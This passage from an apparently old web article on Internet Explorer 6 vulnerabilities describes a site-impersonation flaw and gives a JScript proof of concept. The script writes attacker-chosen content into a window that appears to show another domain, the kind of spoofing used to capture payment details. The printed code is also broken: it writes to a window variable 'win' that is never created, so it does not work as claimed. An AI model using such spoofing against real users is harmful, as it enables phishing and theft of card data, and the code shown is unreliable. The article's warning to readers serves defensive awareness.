Apparently Microsoft were in a little bit of a rush to get Internet Explorer 6 out the door, and forgot to take that extra bit of time to debug and test it for security cracks and holes. In this article Mitchell talks about the latest security holes found in IE6. He shows you how to test your system for vulnerabilities and also provides links to the relevant patches and more information on the holes.
Internet Explorer 6 Hacks And Holes Exposed - Site Impersonation: Mixed Identities (Page 3 of 5 )
If you open a new web browser window using JScript in IE6 with something like "http://www.company.com" as the URL, then you'd be pretty sure that the page you're viewing actually comes from that domain, right? It's impossible to change the contents of a web page on another domain isn't it? Are you sure? Absolutely sure? Thought not.
That's right folks, using just a couple of lines of JScript, you can open a new browser window containing the URL of an external site and modify the body of that page: AKA site impersonation.
Create a new page named c:\site_impersonate.html and enter the following code into it:
<html>
<head>
<title> Site Impersonation </title>
<script language="JavaScript">
<!--
function openWin()
{
url = prompt("Enter a fully qualified domain name:");
win.document.write("You entered the domain name of " + url + ", but I'd rather you see this:<br><br><h1>Hello World!</h1>");
}
-->
</script>
</head>
<body bgcolor="#FFFFFF" onLoad="openWin()">
</body>
</html>
Load the page up in IE6 and enter a fully qualified domain name in the popup window (I entered the name of my site, http://www.devarticles.com). Look at what happens when the JScript code opens a new window:
Once again, think of all the scenarios where this could threaten your personal security. Next time you click on a link to pay for a credit card purchase and it opens in another window, be 500% sure that the site is who they say they are. To do this, right click in the middle of the page and click the properties option. Make sure the address of the site is actually http://www.payment-gateway.com or whatever the URL of the payment provider is. Here are the properties of the page that we just impersonated:
See how the address points to the script that opened the new window? If you're using IE6, always check the address of a page if you're about to enter sensitive information such as your address, phone number, credit card details, etc.
HTML 
HTML5 Boilerplate: Working with jQuery and Modernizr
